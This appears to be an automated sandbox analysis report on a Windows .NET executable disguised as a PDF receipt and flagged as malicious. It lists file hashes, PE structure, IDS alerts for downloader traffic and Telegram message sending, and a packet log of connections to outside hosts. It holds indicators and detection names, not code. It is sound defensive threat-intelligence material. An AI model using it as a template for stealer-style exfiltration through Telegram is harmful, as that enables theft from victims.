                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Entropy (8bit):7.5993791841163345
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                        File name:rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        File size:933'888 bytes
                                                                                                                                                        MD5:14246ea59962956247cb757ff4c485e8
                                                                                                                                                        SHA1:41233827e40eacdc99a408d0b0ecfe78ee24120c
                                                                                                                                                        SHA256:f89d5db1d93b61d6e6346fa86e914a5b02e927c8eee905e658b0818f76a545ca
                                                                                                                                                        SHA512:8dda3374a819f3be57a2793094a77b663af924268e810eb36872e1b308c3faa0bf1dc374d26ad1ce94d6d86a5e958a8bff4b9d647658c0d1265b378857ea1e00
                                                                                                                                                        SSDEEP:24576:7uGlcxORH/ZzPIHhHh79f1P7RTpmZl/7kcmsbY:7uOLUhrP7RTYr
                                                                                                                                                        TLSH:F715BFC03B25B70ECD6DAD35893AECB4A22029697105F6E379DE2B5BB5CD247990CF40
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......8.......$... ...@....... ....................................@................................
                                                                                                                                                        Icon Hash:7fe6e7e7e3e3651f
                                                                                                                                                        Entrypoint:0x110e24be
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x11000000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x678883E5 [Thu Jan 16 03:58:29 2025 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                        Instruction
                                                                                                                                                        jmp dword ptr [11002000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe2470 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe4000 | 0x3580 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe04c4 | 0xe0600 | ca3d551c330c5619ea8ea835d2e380ea | False | 0.8514079909470752 | data | 7.598169781799861 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe4000 | 0x3580 | 0x3600 | bafdf0532100970fdac1bf1ee8fb3910 | False | 0.9108796296296297 | data | 7.684832475100303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe8000 | 0xc | 0x200 | 900ab37472788e1e8c5ed0312da4e4c8 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xe4130 | 0x2f83 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9727041026062649
RT_GROUP_ICON | 0xe70b4 | 0x14 | data | | | 1.05
RT_VERSION | 0xe70c8 | 0x2cc | data | | | 0.43435754189944137
RT_MANIFEST | 0xe7394 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-16T07:02:03.292929+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | TCP
2025-01-16T07:02:04.292895+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | TCP
2025-01-16T07:02:04.974396+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49735 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:05.699112+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49737 | 132.226.247.73 | 80 | TCP
2025-01-16T07:02:06.983360+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49740 | 132.226.247.73 | 80 | TCP
2025-01-16T07:02:07.607453+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49742 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:08.292851+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49740 | 132.226.247.73 | 80 | TCP
2025-01-16T07:02:08.850293+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49745 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:09.538712+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49747 | 132.226.247.73 | 80 | TCP
2025-01-16T07:02:10.145275+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49749 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:10.191417+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49750 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:11.507464+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49753 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:14.088006+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49761 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:14.088595+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49762 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:15.004480+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49764 | 149.154.167.220 | 443 | TCP
2025-01-16T07:02:15.411932+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49765 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:16.746654+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49769 | 104.21.64.1 | 443 | TCP
2025-01-16T07:02:19.007972+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.4 | 49775 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                        Jan 16, 2025 07:02:03.741957903 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:03.784660101 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:03.831337929 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:03.898843050 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:03.898963928 CET44349734104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:03.899017096 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:03.929761887 CET49734443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:03.934973001 CET4973380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:03.940821886 CET8049733132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.147552013 CET8049733132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.160650969 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:04.160738945 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.160883904 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:04.164870977 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:04.164927006 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.292895079 CET4973380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:04.633924007 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.635684967 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:04.635763884 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.974479914 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.974621058 CET44349735104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.974687099 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:04.975023985 CET49735443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:04.977559090 CET4973380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:04.978441000 CET4973780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:04.983304024 CET8049737132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.983381987 CET4973780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:04.983462095 CET4973780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:04.983463049 CET8049733132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:04.983530998 CET4973380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:04.988579988 CET8049737132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:05.658143044 CET8049737132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:05.659593105 CET49739443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:05.659640074 CET44349739104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:05.659797907 CET49739443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:05.659924030 CET49739443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:05.659936905 CET44349739104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:05.699111938 CET4973780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.017769098 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.022701025 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.022770882 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.023052931 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.027856112 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.135118008 CET44349739104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.136883020 CET49739443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:06.136909008 CET44349739104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.283680916 CET44349739104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.283840895 CET44349739104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.284020901 CET49739443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:06.284168959 CET49739443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:06.287800074 CET4974180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.293268919 CET8049741132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.293380022 CET4974180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.293421030 CET4974180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.298614025 CET8049741132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.698771000 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.718485117 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.723301888 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.927599907 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.976210117 CET8049741132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.983360052 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:06.990603924 CET49742443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:06.990693092 CET44349742104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:06.990808010 CET49742443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.007399082 CET49742443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.007438898 CET44349742104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.090341091 CET4974180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:07.377240896 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.377299070 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.377363920 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.408946991 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.409027100 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.462789059 CET44349742104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.465044975 CET49742443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.465111971 CET44349742104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.607537985 CET44349742104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.607700109 CET44349742104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.607760906 CET49742443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.608112097 CET49742443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.611860991 CET4974180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:07.612862110 CET4974480192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:07.617604971 CET8049741132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.617657900 CET4974180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:07.618133068 CET8049744132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.618200064 CET4974480192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:07.618292093 CET4974480192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:07.623280048 CET8049744132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.869330883 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.869427919 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.871993065 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.872030020 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.872417927 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:07.927162886 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:07.967328072 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.032780886 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.032927036 CET44349743104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.032978058 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.035674095 CET49743443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.039510012 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:08.044387102 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.248792887 CET8049740132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.251054049 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.251157045 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.251260996 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.251581907 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.251606941 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.292850971 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:08.295749903 CET8049744132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.297941923 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.297985077 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.298099995 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.298428059 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.298443079 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.339752913 CET4974480192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:08.706593037 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.708714962 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.708795071 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.767040014 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.768934965 CET49746443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.768960953 CET44349746104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.850321054 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.850394964 CET44349745104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:08.850584030 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.850641966 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.850974083 CET49745443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:08.854706049 CET4974080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:08.857784033 CET4974780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:13.962305069 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.962383032 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088083029 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088263988 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088453054 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.088716984 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088819027 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.088860989 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.089163065 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.089574099 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.094136953 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.095668077 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.100857973 CET8049759132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.101030111 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.102296114 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.102385998 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.102797031 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.102813959 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.108068943 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.108277082 CET8049760132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.108488083 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.110444069 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.110552073 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.110645056 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.111027956 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.111061096 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.757618904 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.757711887 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.759485960 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.759505033 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.760003090 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.761554003 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.795737982 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.797000885 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.797048092 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.797151089 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.797333956 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.797344923 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.807377100 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.839890957 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.004565954 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.004703999 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.004842043 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:15.010381937 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:15.274079084 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.276901960 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:15.276921034 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.412025928 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.412158966 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.412209988 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:15.412456036 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:15.415086985 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.416125059 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.420161009 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.420242071 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.421001911 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.421088934 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.421257973 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.426089048 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.113840103 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.114898920 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.114940882 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.115101099 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.115504026 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.115520000 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.167912960 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.603981972 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.606329918 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.606369019 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.746766090 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.746928930 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.749839067 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.749839067 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.753272057 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.757278919 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.758295059 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.762058973 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.762128115 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.762437105 CET4977180192.168.2.4132.226.247.73
